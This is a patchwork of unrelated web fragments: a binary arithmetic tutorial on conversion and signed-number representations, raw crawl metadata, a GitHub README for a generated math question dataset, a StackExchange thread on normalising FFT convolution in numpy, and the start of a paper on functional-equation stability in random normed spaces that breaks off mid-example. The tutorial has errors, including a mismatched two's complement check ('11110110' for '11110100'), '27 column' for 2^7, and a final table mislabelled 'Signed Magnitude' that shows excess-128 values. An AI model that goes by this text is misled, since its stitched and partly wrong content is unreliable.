that:\n\n``` 2^0=1\n2^1=2\n2^2=4\n2^3=8\n2^4=16\n2^5=32\n2^6=64\n2^7=128\n```\nand so on. To convert the decimal number 75 to binary, we would find the largest power of 2 less than 75, which is 64. Thus, we would put a 1 in the 2^6 column, and subtract 64 from 75, giving us 11. The largest power of 2 in 11 is 8, or 2^3. Put 1 in the 2^3 column, and 0 in 2^4 and 2^5. Subtract 8 from 11 to get 3. Put 1 in the 2^1 column, 0 in 2^2, and subtract 2 from 3. We're left with 1, which goes in 2^0, and we subtract one to get zero. Thus, our number is 1001011.\n\nMaking this algorithm a bit more formal gives us:\n\n1. Let D=number we wish to convert from decimal to binary\n2. Repeat until D=0\n• a. Find the largest power of two in D. Let this equal P.\n• b. Put a 1 in binary column P.\n• c. Subtract P from D.\n3. Put zeros in all columns which don't have ones.\nThis algorithm is a bit awkward. Particularly step 3, \"filling in the zeros.\" Therefore, we should rewrite it such that we ascertain the value of each column individually, putting in 0's and 1's as we go:\n\n1. Let D= the number we wish to convert from decimal to binary\n2. Find P, such that 2^P is the largest power of two smaller than D.\n3. Repeat until P<0\n• If 2^P<=D then\n• put 1 into column P\n• subtract 2^P from D\n• Else\n• put 0 into column P\n• End if\n• Subtract 1 from P\n\nNow that we have an algorithm, we can use it to convert numbers from decimal to binary relatively painlessly. Let's try the number D=55.\n\n• Our first step is to find P. We know that 2^4=16, 2^5=32, and 2^6=64. Therefore, P=5.\n• 2^5<=55, so we put a 1 in the 2^5 column: `1-----`.\n• Subtracting 55-32 leaves us with 23. Subtracting 1 from P gives us 4.\n• Following step 3 again, 2^4<=23, so we put a 1 in the 2^4 column: `11----`.\n• Next, subtract 16 from 23, to get 7. Subtract 1 from P gives us 3.\n• 2^3>7, so we put a 0 in the 2^3 column: `110---`\n• Next, subtract 1 from P, which gives us 2.\n• 2^2<=7, so we put a 1 in the 2^2 column: `1101--`\n• Subtract 4 from 7 to get 3. Subtract 1 from P to get 1.\n• 2^1<=3, so we put a 1 in the 2^1 column: `11011-`\n• Subtract 2 from 3 to get 1. Subtract 1 from P to get 0.\n• 2^0<=1, so we put a 1 in the 2^0 column: `110111`\n• Subtract 1 from 1 to get 0. Subtract 1 from P to get -1.\n• P is now less than zero, so we stop.\n\n### Another algorithm for converting decimal to binary\n\nHowever, this is not the only approach possible. We can start at the right, rather than the left.\n\nAll binary numbers are in the form\n\n```a[n]*2^n + a[n-1]*2^(n-1)+...+a*2^1 + a*2^0\n```\nwhere each a[i] is either a 1 or a 0 (the only possible digits for the binary system). The only way a number can be odd is if it has a 1 in the 2^0 column, because all powers of two greater than 0 are even numbers (2, 4, 8, 16...). This gives us the rightmost digit as a starting point.\n\nNow we need to do the remaining digits. One idea is to \"shift\" them. It is also easy to see that multiplying and dividing by 2 shifts everything by one column: two in binary is 10, or (1*2^1). Dividing (1*2^1) by 2 gives us (1*2^0), or just a 1 in binary. Similarly, multiplying by 2 shifts in the other direction: (1*2^1)*2=(1*2^2) or 10 in binary. Therefore\n\n```{a[n]*2^n + a[n-1]*2^(n-1) + ... + a*2^1 + a*2^0}/2\n```\n\nis equal to\n\n```a[n]*2^(n-1) + a[n-1]*2^(n-2) + ... + a2^0\n```\n\nLet's look at how this can help us convert from decimal to binary. Take the number 163. We know that since it is odd, there must be a 1 in the 2^0 column (a=1). We also know that it equals 162+1. If we put the 1 in the 2^0 column, we have 162 left, and have to decide how to translate the remaining digits.\n\nTwo's column: Dividing 162 by 2 gives 81. The number 81 in binary would also have a 1 in the 2^0 column. Since we divided the number by two, we \"took out\" one power of two. Similarly, the statement a[n-1]*2^(n-1) + a[n-2]*2^(n-2) + ... + a*2^0 has a power of two removed. Our \"new\" 2^0 column now contains a1. We learned earlier that there is a 1 in the 2^0 column if the number is odd. Since 81 is odd, a=1. Practically, we can simply keep a \"running total\", which now stands at 11 (a=1 and a=1). Also note that a1 is essentially \"remultiplied\" by two just by putting it in front of a, so it is automatically fit into the correct column.\n\nFour's column: Now we can subtract 1 from 81 to see what remainder we still must place (80). Dividing 80 by 2 gives 40. Therefore, there must be a 0 in the 4's column, (because what we are actually placing is a 2^0 column, and the number is not odd).\n\nEight's column: We can divide by two again to get 20. This is even, so we put a 0 in the 8's column. Our running total now stands at a=0, a=0, a=1, and a=1.\n\nWe can continue in this manner until there is no remainder to place.\n\n``` Let's formalize this algorithm:\n1. Let D= the number we wish to convert from decimal to binary.\n2. Repeat until D=0:\na) If D is odd, put \"1\" in the leftmost open column, and subtract 1 from D.\nb) If D is even, put \"0\" in the leftmost open column.\nc) Divide D by 2.\nEnd Repeat\nFor the number 163, this works as follows:\n1. Let D=163\n2. b) D is odd, put a 1 in the 2^0 column.\nSubtract 1 from D to get 162.\nc) Divide D=162 by 2.\nTemporary Result: 01 New D=81\nD does not equal 0, so we repeat step 2.\n\n2. b) D is odd, put a 1 in the 2^1 column.\nSubtract 1 from D to get 80.\nc) Divide D=80 by 2.\nTemporary Result: 11 New D=40\nD does not equal 0, so we repeat step 2.\n\n2. b) D is even, put a 0 in the 2^2 column.\nc) Divide D by 2.\nTemporary Result:011 New D=20\n\n2. b) D is even, put a 0 in the 2^3 column.\nc) Divide D by 2.\nTemporary Result: 0011 New D=10\n\n2. b) D is even, put a 0 in the 2^4 column.\nc) Divide D by 2.\nTemporary Result: 00011 New D=5\n\n2. a) D is odd, put a 1 in the 2^5 column.\nSubtract 1 from D to get 4.\nc) Divide D by 2.\nTemporary Result: 100011 New D=2\n\n2. b) D is even, put a 0 in the 2^6 column.\nc) Divide D by 2.\nTemporary Result: 0100011 New D=1\n\n2. a) D is odd, put a 1 in the 27 column.\nSubtract 1 from D to get D=0.\nc) Divide D by 2.\nTemporary Result: 10100011 New D=0\n\nD=0, so we are done, and the decimal number 163 is equivalent to the binary number 10100011.```\n\nSince we already knew how to convert from binary to decimal, we can easily verify our result. 10100011=(1*2^0)+(1*2^1)+(1*2^5)+(1*2^7)=1+2+32+128= 163.\n\n## Negation in the Binary System\n\nThese techniques work well for non-negative integers, but how do we indicate negative numbers in the binary system?\n\nBefore we investigate negative numbers, we note that the computer uses a fixed number of \"bits\" or binary digits. An 8-bit number is 8 digits long. For this section, we will work with 8 bits.\n\nSigned Magnitude:\n\nThe simplest way to indicate negation is signed magnitude. In signed magnitude, the left-most bit is not actually part of the number, but is just the equivalent of a +/- sign. \"0\" indicates that the number is positive, \"1\" indicates negative. In 8 bits, 00001100 would be 12 (break this down into (1*2^3) + (1*2^2) ). To indicate -12, we would simply put a \"1\" rather than a \"0\" as the first bit: 10001100.\n\nOne's Complement:\n\nIn one's complement, positive numbers are represented as usual in regular binary. However, negative numbers are represented differently. To negate a number, replace all zeros with ones, and ones with zeros - flip the bits. Thus, 12 would be 00001100, and -12 would be 11110011. As in signed magnitude, the leftmost bit indicates the sign (1 is negative, 0 is positive). To compute the value of a negative number, flip the bits and translate as before.\n\nTwo's Complement:\n\nBegin with the number in one's complement. Add 1 if the number is negative. Twelve would be represented as 00001100, and -12 as 11110100. To verify this, let's subtract 1 from 11110110, to get 11110011. If we flip the bits, we get 00001100, or 12 in decimal.\n\nExcess 2^(m-1):\n\nIn this notation, \"m\" indicates the total number of bits. For us (working with 8 bits), it would be excess 2^7. To represent a number (positive or negative) in excess 2^7, begin by taking the number in regular binary representation. Then add 2^7 (=128) to that number. For example, 7 would be 128 + 7=135, or 2^7+2^2+2^1+2^0, and, in binary,10000111. We would represent -7 as 128-7=121, and, in binary, 01111001.\n\nNote:\n\n• Unless you know which representation has been used, you cannot figure out the value of a number.\n• A number in excess 2^(m-1) is the same as that number in two's complement with the leftmost bit flipped.\n\nTo see the advantages and disadvantages of each method, let's try working with them.\n\n### What would the binary number 1011 be in decimal notation?\n\n``` 1011=(1*2^3)+(0*2^2)+(1*2^1)+(1*2^0)\n= (1*8) + (0*4) + (1*2) + (1*1)\n= 11 (in decimal notation)\n```\nGo back to the question\n\n### Try converting these numbers from binary to decimal:\n\n```10=(1*2^1) + (0*2^0) = 2+0 = 2\n111 = (1*2^2) + (1*2^1) + (1*2^0) = 4+2+1=7\n10101= (1*2^4) + (0*2^3) + (1*2^2) + (0*2^1) + (1*2^0)=16+0+4+0+1=21\n11110= (1*2^4) + (1*2^3) + (1*2^2) + (1*2^1) + (0*2^0)=16+8+4+2+0=30\n```\nGo back to the question\n\n### Try a few examples of binary addition:\n\n``` 1 1\n111 111 111\n+110 +110 +110\n______ ______ _____\n1 01 1101\n\n1 11 1\n101 101 101\n+111 +111 +111\n_____ ____ _____\n0 00 1100\n\n1 1 1\n111 111 111\n+111 +111 +111\n_____ _____ _____\n0 10 1110\n```\n\nUsing the regular algorithm for binary adition, add (5+12), (-5+12), (-12+-5), and (12+-12) in each system. Then convert back to decimal numbers.\n\n```Signed Magnitude:\n\n5+12 -5+12 -12+-5 12+-12\n\n00000101 10000101 10001100 00001100\n00001100 00001100 10000101 10001100\n__________ ________ ________ _________\n00010001 10010001 00010000 10011000\n\n17 -17 16 -24\n\nOne' Complement:\n\n00000101 11111010 11110011 00001100\n00001100 00001100 11111010 11110011\n_________ ________ ________ ________\n00010001 00000110 11101101 11111111\n\n17 6 -18 0\n\nTwo's Complement:\n\n00000101 11111011 11110100 00001100\n00001100 00001100 11111011 11110100\n________ ________ ________ ________\n00010001 00000111 11101111 00000000\n\n17 7 -17 0\n\nSigned Magnitude:\n\n10000101 01111011 01110100 00001100\n10001100 10001100 01111011 01110100\n________ ________ ________ ________\n00010001 00000111 11101111 01111100\n\n109 119 111 124\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8561083,"math_prob":0.9932956,"size":15332,"snap":"2020-45-2020-50","text_gpt3_token_len":5156,"char_repetition_ratio":0.1572286,"word_repetition_ratio":0.102139406,"special_character_ratio":0.40927473,"punctuation_ratio":0.12145197,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99987483,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-24T20:07:06Z\",\"WARC-Record-ID\":\"<urn:uuid:a3301088-aa9c-4584-9ee9-3f41421aa54b>\",\"Content-Length\":\"27543\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:19e149e7-16c2-459a-94bf-a3a291de9c90>\",\"WARC-Concurrent-To\":\"<urn:uuid:05cfb9a0-dd36-4d86-b45a-fa2cd8f2386b>\",\"WARC-IP-Address\":\"23.229.187.38\",\"WARC-Target-URI\":\"https://tincantalk.com/Networking_Basics_Binary.html\",\"WARC-Payload-Digest\":\"sha1:SQ7H2RNIMUHJMJVZCJERBBVXPUF3XJNS\",\"WARC-Block-Digest\":\"sha1:ANA7XDHJONW5B36A44KMW42TY4ROQDK5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107884755.46_warc_CC-MAIN-20201024194049-20201024224049-00624.warc.gz\"}"}
https://github.com/deepmind/mathematics_dataset?utm_campaign=DataScience_Digest&utm_medium=email&utm_source=Revue%20newsletter
[ "Skip to content\n\n# deepmind/mathematics_dataset\n\nNo description, website, or topics provided.\ndavidsaxton Merge pull request #1 from javierlorenzod/patch-1\n`Fixed Markdown typo in README.md`\nLatest commit 4c39d1f Apr 4, 2019\nType Name Latest commit message Commit time\nFailed to load latest commit information.", null, "mathematics_dataset Apr 3, 2019", null, "CONTRIBUTING.md Feb 13, 2019", null, "LICENSE Feb 13, 2019", null, "README.md Apr 3, 2019", null, "setup.py Apr 3, 2019\n\n# Mathematics Dataset\n\nThis dataset code generates mathematical question and answer pairs, from a range of question types at roughly school-level difficulty. This is designed to test the mathematical learning and algebraic reasoning skills of learning models.\n\nOriginal paper: Analysing Mathematical Reasoning Abilities of Neural Models (Saxton, Grefenstette, Hill, Kohli).\n\n## Example questions\n\n``````Question: Solve -42*r + 27*c = -1167 and 130*r + 4*c = 372 for r.\nAnswer: 4\n\nQuestion: Calculate -841880142.544 + 411127.\nAnswer: -841469015.544\n\nQuestion: Let x(g) = 9*g + 1. Let q(c) = 2*c + 1. Let f(i) = 3*i - 39. Let w(j) = q(x(j)). Calculate f(w(a)).\nAnswer: 54*a - 30\n\nQuestion: Let e(l) = l - 6. Is 2 a factor of both e(9) and 2?\nAnswer: False\n\nQuestion: Let u(n) = -n**3 - n**2. Let e(c) = -2*c**3 + c. Let l(j) = -118*e(j) + 54*u(j). What is the derivative of l(a)?\nAnswer: 546*a**2 - 108*a - 118\n\nQuestion: Three letters picked without replacement from qqqkkklkqkkk. Give prob of sequence qql.\nAnswer: 1/110\n``````\n\n## Pre-generated data\n\nPre-generated files\n\n### Version 1.0\n\nThis is the version released with the original paper. It contains 2 million (question, answer) pairs per module, with questions limited to 160 characters in length, and answers to 30 characters in length. Note the training data for each question type is split into \"train-easy\", \"train-medium\", and \"train-hard\". This allows training models via a curriculum. The data can also be mixed together uniformly from these training datasets to obtain the results reported in the paper. Categories:\n\n• algebra (linear equations, polynomial roots, sequences)\n• arithmetic (pairwise operations and mixed expressions, surds)\n• calculus (differentiation)\n• comparison (closest numbers, pairwise comparisons, sorting)\n• measurement (conversion, working with time)\n• numbers (base conversion, remainders, common divisors and multiples, primality, place value, rounding numbers)\n• polynomials (addition, simplification, composition, evaluating, expansion)\n• probability (sampling without replacement)\n\n## Getting the source\n\n### PyPI\n\nThe easiest way to get the source is to use pip:\n\n`\\$ pip install mathematics_dataset`\n\n### From GitHub\n\nAlternately you can get the source by cloning the mathematics_dataset repository:\n\n```\\$ git clone https://github.com/deepmind/mathematics_dataset\n\\$ pip install --upgrade mathematics_dataset/```\n\n## Generating examples\n\nGenerated examples can be printed to stdout via the `generate` script. For example:\n\n`python -m mathematics_dataset.generate --filter=linear_1d`\n\nwill generate example (question, answer) pairs for solving linear equations in one variable.\n\nWe've also included `generate_to_file.py` as an example of how to write the generated examples to text files. You can use this directly, or adapt it for your generation and training needs.\n\nYou can’t perform that action at this time." ]
[ null, "https://github.githubassets.com/images/spinners/octocat-spinner-32.gif", null, "https://github.githubassets.com/images/spinners/octocat-spinner-32.gif", null, "https://github.githubassets.com/images/spinners/octocat-spinner-32.gif", null, "https://github.githubassets.com/images/spinners/octocat-spinner-32.gif", null, "https://github.githubassets.com/images/spinners/octocat-spinner-32.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7999936,"math_prob":0.84105086,"size":2762,"snap":"2019-13-2019-22","text_gpt3_token_len":687,"char_repetition_ratio":0.12327774,"word_repetition_ratio":0.0,"special_character_ratio":0.262853,"punctuation_ratio":0.15369262,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9948008,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-21T07:01:07Z\",\"WARC-Record-ID\":\"<urn:uuid:e32b7c0f-30e6-4c9f-893e-ff82a537f2c9>\",\"Content-Length\":\"89023\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3dfabd1e-1f11-4730-b52f-d3efd6e2e698>\",\"WARC-Concurrent-To\":\"<urn:uuid:b3bb26b5-f15f-4aa8-8119-06132ec44206>\",\"WARC-IP-Address\":\"192.30.253.112\",\"WARC-Target-URI\":\"https://github.com/deepmind/mathematics_dataset?utm_campaign=DataScience_Digest&utm_medium=email&utm_source=Revue%20newsletter\",\"WARC-Payload-Digest\":\"sha1:HLXVGWIGDZACMKEKRNS6LNTFAUOKM3UZ\",\"WARC-Block-Digest\":\"sha1:TA5ZGSIEQ5JFFGVAP3JWVEGRPUZTPZWO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232256281.35_warc_CC-MAIN-20190521062300-20190521084300-00386.warc.gz\"}"}
https://scicomp.stackexchange.com/questions/25950/wrong-amplitude-of-convolution-using-numpy-fft/32988
[ "# Wrong amplitude of convolution using numpy fft\n\nI try to convolve a rectangle function in [-1/2, 1/2] with itself using fft. The convolution should be a tent shaped function, see figure below.", null, "The code is below. In the 3rd to last line I add /50 so it appears correct - I have no idea what the normalization factor should be. And my question is how to normalize the power of a fft result, so the subsequent application of ifft gives the correct result?\n\nimport numpy as np\nfrom numpy.fft import fft, ifft, fftshift, ifftshift\nN = 1000\nt=np.linspace(-10, 10, N)\ndt = t-t\n\ndata = 1.0*(np.abs(t)<0.5)\ndata_fft = np.fft.fft(data)\n\nplt.hold(1)\nplt.plot(t, (ifft(data_fft**1)), 'r')\nplt.plot(t, ifftshift(ifft(data_fft**2)) / 50.0, 'g')\nplt.xlim(-4,4)\nplt.show()\n\n• The np.fft computations are correct; what is incorrect is that you expect these computations to give different results. It appears that you trying to verify Fourier transform properties of continuous-time signals by discretizing the latter and applying discrete Fourier transform (FFT). I would not recommend this approach due to subtle but critical differences between the continuous and discrete time domains. – Stelios Jan 17 '17 at 12:25\n• @Stelios You are exact right, I am trying to verify the convolution property of the continuous Fourier transform. Could you please elaborate on the \"subtle but critical differences\"? I was expecting a straightforward relation between the two, no more than some normalization. – Taozi Jan 17 '17 at 14:14\n• This is a rather deep topic. Just to give you an idea, consider for example the rectangular pulse signal. Whereas the continuous-time version has a well defined notion of \"area\", which is obtained by integration of the singal and is equal to 1, no such notion exists for the discrete-time version. The only \"similar\" quantity in the discrete-time version is the sum of the sample values, which is equal to 50. However this value will be different if you choose a different sampling period (dt). – Stelios Jan 17 '17 at 15:25\n• @Stelios Thank you for your reply. But how about the sampling \"interval\" of the rectangle function. If you discretize it into 50 points, then the gap between the samples is 1/50. With numerical integration like the rectangle rule, you still have area 1 -- and this is independent of how many sample you use if you consider it from a numerical integration perspective. – Taozi Jan 17 '17 at 15:38\n• Sure, however, this observation is relevant in the case where you want to compute the Fourier integrals numerically. In that case you should do the integration manually (or using a numerical integration function) and not use (I)FFT. The (I)FFT algorithm does not incorporate any sampling period information, i.e., it always implicitly assumes a normalized sampling period of 1. – Stelios Jan 17 '17 at 15:47\n\nYou actually do recover the convolution, but as it is discussed in the comments, there is a normalization issue due to discretization.\n\nAccording to the documentation, fft is implemented like this:\n\n$$A_k = \\sum_{m=0}^{n-1} a_m \\exp \\{ - 2\\pi i \\frac{mk}{n} \\}$$\n\nwith $$A_k$$ being the Fourier-coefficients, $$a_m$$ the $$m$$-th element of your signal vector and $$n$$ the length of the signal.\n\nSquaring this gives you\n\n$$A_k^2 = \\sum_{m=0}^{n-1} \\sum_{m'=0}^{n-1} a_m a_{m'} \\exp\\{ - 2\\pi i \\frac{(m+m')k}{n} \\} \\}$$\n\nNow, applying ifft to the squared Fourier-transform gives you, using the ifft-definition from the documentation:\n\n$$\\text{ifft}(A_k^2)_{m''} = \\frac{1}{n} \\sum_{k=0}^{n-1} \\sum_{m=0}^{n-1} \\sum_{m'=0}^{n-1}a_m \\exp\\{ - 2\\pi i \\frac{(m+m'-m'')k}{n} \\} \\}$$\n\nWith the observation, that\n\n$$\\frac{1}{n} \\sum_{k=0}^{n-1} \\exp\\{ - 2\\pi i \\frac{(m+m'-m'')k}{n} \\} = \\delta_{m+m', m''}$$\n\nyou end up with\n\n$$\\text{ifft}(A_k^2)_{m''} = \\sum_{m=0}^{n-1} \\sum_{m'=0}^{n-1} a_m a_{m'} \\delta_{m+m', m''} = \\sum_{m=0}^{n-1} a_m a_{m'' - m}$$\n\nThis is actually how np.convolve is defined (except for some padding). If you use np.convolve on your data, you end up with the same result (except for some padding), so within the numpy-world, you did exactly what you set out to do, i.e. verify, the convolution property of the Fourier transform. As noted in the comments however, neither fft nor convolve \"know\" anything about your descretization, so you have to take care of that manually by multiplying the results with dt." ]
[ null, "https://i.stack.imgur.com/TKiIX.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8220627,"math_prob":0.99591887,"size":2312,"snap":"2021-31-2021-39","text_gpt3_token_len":738,"char_repetition_ratio":0.11915078,"word_repetition_ratio":0.041899443,"special_character_ratio":0.33088234,"punctuation_ratio":0.088552915,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999248,"pos_list":[0,1,2],"im_url_duplicate_count":[null,8,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-27T02:28:53Z\",\"WARC-Record-ID\":\"<urn:uuid:7377bd6d-eaf9-4a4c-88bc-35707986a62a>\",\"Content-Length\":\"173219\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7430bcc8-b47a-4577-a80d-17ca8035cd42>\",\"WARC-Concurrent-To\":\"<urn:uuid:f1fef8ee-173f-4daf-91a9-7f29f298d472>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://scicomp.stackexchange.com/questions/25950/wrong-amplitude-of-convolution-using-numpy-fft/32988\",\"WARC-Payload-Digest\":\"sha1:QL7EU3I5L7XC7KOAYHNWY54JJVKTZNHS\",\"WARC-Block-Digest\":\"sha1:OEIRAZPHCBCDZ4L44YHP5CGJTUPGSDKP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046152168.38_warc_CC-MAIN-20210727010203-20210727040203-00462.warc.gz\"}"}
https://journalofinequalitiesandapplications.springeropen.com/articles/10.1186/1029-242X-2011-62
[ "Skip to main content\n\n# On nonlinear stability in various random normed spaces\n\n## Abstract\n\nIn this article, we prove the nonlinear stability of the quartic functional equation\n\nin the setting of random normed spaces Furthermore, the interdisciplinary relation among the theory of random spaces, the theory of non-Archimedean space, the theory of fixed point theory, the theory of intuitionistic spaces and the theory of functional equations are also presented in the article.\n\n## 1. Introduction\n\nThe study of stability problems for functional equations is related to a question of Ulam concerning the stability of group homomorphisms and affirmatively answered for Banach spaces by Hyers . Subsequently, this result of Hyers was generalized by Aoki for additive mappings and by Rassias for linear mappings by considering an unbounded Cauchy difference. The article of Rassias has provided a lot of influence in the development of what we now call generalized Ulam-Hyers stability of functional equations. We refer the interested readers for more information on such problems to the article .\n\nRecently, Alsina , Chang, et al. , Mirmostafaee et al. , , Miheţ and Radu , Miheţ et al. , , , , Baktash et al. , Eshaghi et al. , Saadati et al. , investigated the stability in the settings of fuzzy, probabilistic, and random normed spaces.\n\nIn this article, we study the stability of the following functional equation\n\n(1.1)\n\nin the various random normed spaces via different methods. Since ax4 is a solution of above functional equation, we say it quartic functional equation.\n\n## 2. Preliminaries\n\nIn this section, we recall some definitions and results which will be used later on in the article.\n\nA triangular norm (shorter t-norm) is a binary operation on the unit interval [0, 1], i.e., a function T : [0, 1] × [0, 1] → [0, 1] such that for all a, b, c [0, 1] the following four axioms satisfied:\n\n1. (i)\n\nT(a, b) = T(b, a) (commutativity);\n\n2. (ii)\n\nT(a, (T(b, c))) = T(T(a, b), c) (associativity);\n\n3. (iii)\n\nT(a, 1) = a (boundary condition);\n\n4. (iv)\n\nT(a, b) ≤ T(a, c) whenever bc (monotonicity).\n\nBasic examples are the Lukasiewicz t-norm T L , T L (a, b) = max (a + b - 1, 0) a, b [0, 1] and the t-norms T P , T M , T D , where T P (a, b) := ab, T M (a, b) := min {a, b},\n\n$T D ( a , b ) : = min ( a , b ) , if max ( a , b ) = 1 ; 0 , otherwise .$\n\nIf T is a t-norm then $x T ( n )$ is defined for every x [0, 1] and n N {0} by 1, if n = 0 and $T ( x T ( n - 1 ) , x )$, if n ≥ 1. A t-norm T is said to be of Hadžić-type (we denote by $T∈H$) if the family $( x T ( n ) ) n ∈ N$ is equicontinuous at x = 1 (cf. ).\n\nOther important triangular norms are (see ):\n\n• the Sugeno-Weber family ${ T λ S W } λ ∈ [ - 1 , ∞ ]$ is defined by $T - 1 S W = T D$, $T ∞ S W = T P$ and\n\n$T λ S W ( x , y ) = max 0 , x + y - 1 + λ x y 1 + λ$\n\nif λ (-1, ∞).\n\n• the Domby family ${ T λ D } λ ∈ [ 0 , ∞ ]$, defined by T D , if λ = 0, T M , if λ = ∞ and\n\n$T λ D ( x , y ) = 1 1 + ( ( 1 − x x ) λ + ( 1 − y y ) λ ) 1 / λ$\n\nif λ (0, ∞).\n\n• the Aczel-Alsina family ${ T λ A A } λ ∈ [ 0 , ∞ ]$, defined by T D , if λ = 0, T M , if λ = ∞ and\n\n$T λ A A ( x , y ) = e - ( | log x | λ + | log y | λ ) 1 ∕ λ$\n\nif λ (0, ∞).\n\nA t-norm T can be extended (by associativity) in a unique way to an n-array operation taking for (x1, ..., x n ) [0, 1]n the value T (x1, ..., x n ) defined by\n\n$T i = 1 0 x i = 1 , T i = 1 n x i = T ( T i = 1 n - 1 x i , x n ) = T ( x 1 , … , x n ) .$\n\nT can also be extended to a countable operation taking for any sequence (x n )nNin [0, 1] the value\n\n$T i = 1 ∞ x i = lim n → ∞ T i = 1 n x i .$\n(2.1)\n\nThe limit on the right side of (2.1) exists since the sequence ${ T i = 1 n x i } n ∈ ℕ$ is non-increasing and bounded from below.\n\nProposition 2.1. (i) For TT L the following implication holds:\n\n$lim n → ∞ T i = 1 ∞ x n + i = 1 ⇔ ∑ n = 1 ∞ ( 1 - x n ) < ∞ .$\n\n(ii) If T is of Hadžić-type then\n\n$lim n → ∞ T i = 1 ∞ x n + i = 1$\n\nfor every sequence {x n }nNin [0, 1] such that limn→∞x n = 1.\n\n(iii) If $T∈ { T λ A A } λ ∈ ( 0 , ∞ ) ∪ { T λ D } λ ∈ ( 0 , ∞ )$, then\n\n$lim n → ∞ T i = 1 ∞ x n + i = 1 ⇔ ∑ n = 1 ∞ ( 1 - x n ) α < ∞ .$\n\n(iv) If $T∈ { T λ S W } λ ∈ [ - 1 , ∞ )$, then\n\n$lim n → ∞ T i = 1 ∞ x n + i = 1 ⇔ ∑ n = 1 ∞ ( 1 - x n ) < ∞ .$\n\nDefinition 2.2. A random normed space (briefly, RN-space) is a triple (X, μ, T), where X is a vector space, T is a continuous t-norm, and μ is a mapping from X into D+ such that, the following conditions hold:\n\n(RN1) μ x (t) = ε0(t) for all t > 0 if and only if x = 0;\n\n(RN2) $μ α x ( t ) = μ x t | α |$ for all x X, α ≠ 0;\n\n(RN3) μx+y(t + s) ≥ T (μ x (t), μ y (s)) for all x, y, z X and t, s ≥ 0.\n\nDefinition 2.3. Let (X, μ, T) be an RN-space.\n\n1. (1)\n\nA sequence {x n } in X is said to be convergent to x in X if, for every ε > 0 and λ > 0, there exists a positive integer N such that $μ x n - x ( ε ) >1-λ$ whenever nN.\n\n2. (2)\n\nA sequence {x n } in X is called Cauchy if, for every ε > 0 and λ > 0, there exists a positive integer N such that $μ x n - x m ( ε ) >1-λ$ whenever nmN.\n\n3. (3)\n\nAn RN-space (X, μ, T) is said to be complete if every Cauchy sequence in X is convergent to a point in X.\n\nTheorem 2.4. If (X, μ, T) is an RN-space and {x n } is a sequence such that x n x, then $lim n → ∞ μ x n ( t ) = μ x ( t )$ almost everywhere.\n\n## 3. Non-Archimedean random normed space\n\nBy a non-Archimedean field we mean a field $K$ equipped with a function (valuation) | · | from K into [0, ∞] such that |r| = 0 if and only if r = 0, |rs| = |r| |s|, and |r + s| ≤ max{|r|, |s|} for all $r,s∈K$. Clearly |1| = | -1| = 1 and |n| ≤ 1 for all n . By the trivial valuation we mean the mapping | · | taking everything but 0 into 1 and |0| = 0. Let $X$ be a vector space over a field $K$ with a non-Archimedean non-trivial valuation | · |. A function $||⋅||:X→ [ 0 , ∞ ]$ is called a non-Archimedean norm if it satisfies the following conditions:\n\n1. (i)\n\n||x|| = 0 if and only if x = 0;\n\n2. (ii)\n\nfor any $r∈K$, $x∈X$, ||rx|| = ||r|||x||;\n\n3. (iii)\n\nthe strong triangle inequality (ultrametric); namely,\n\n$| | x + y | | ≤ max { | | x | | , | | y | | } ( x , y ∈ X ) .$\n\nThen $( X , | | ⋅ | | )$ is called a non-Archimedean normed space. Due to the fact that\n\n$| | x n - x m | | ≤ max { | | x j + 1 - x j | | : m ≤ j ≤ n - 1 } ( n > m ) ,$\n\na sequence {x n } is Cauchy if and only if {xn+1- xn} converges to zero in a non-Archimedean normed space. By a complete non-Archimedean normed space we mean one in which every Cauchy sequence is convergent.\n\nIn 1897, Hensel discovered the p-adic numbers as a number theoretical analogue of power series in complex analysis. Fix a prime number p. For any non-zero rational number x, there exists a unique integer n x such that $x= a b p n x$, where a and b are integers not divisible by p. Then $|x | p := p - n x$ defines a non-Archimedean norm on Q. The completion of Q with respect to the metric d(x, y) = |x - y| p is denoted by Q p , which is called the p-adic number field.\n\nThroughout the article, we assume that $X$ is a vector space and $Y$ is a complete non-Archimedean normed space.\n\nDefinition 3.1. A non-Archimedean random normed space (briefly, non-Archimedean RN-space) is a triple $( X , μ , T )$, where X is a linear space over a non-Archimedean field $K$, T is a continuous t-norm, and μ is a mapping from X into D+ such that the following conditions hold:\n\n(NA-RN1) μ x (t) = ε0(t) for all t > 0 if and only if x = 0;\n\n(NA-RN2) $μ α x ( t ) = μ x t | α |$ for all $x∈X$, t > 0, α ≠ 0;\n\n(NA-RN3) μx+y(max{t, s}) ≥ T (μ x (t), μ y (s)) for all $x,y,z∈X$ and t, s ≥ 0.\n\nIt is easy to see that if (NA-RN3) holds then so is\n\n(RN3) μx+y(t + s) ≥ T (μ x (t), μ y (s)).\n\nAs a classical example, if $( X , | | . | | )$ is a non-Archimedean normed linear space, then the triple $( X , μ , T M )$, where\n\n$μ x ( t ) = 0 t ≤ | | x | | 1 t > | | x | |$\n\nis a non-Archimedean RN-space.\n\nExample 3.2. Let 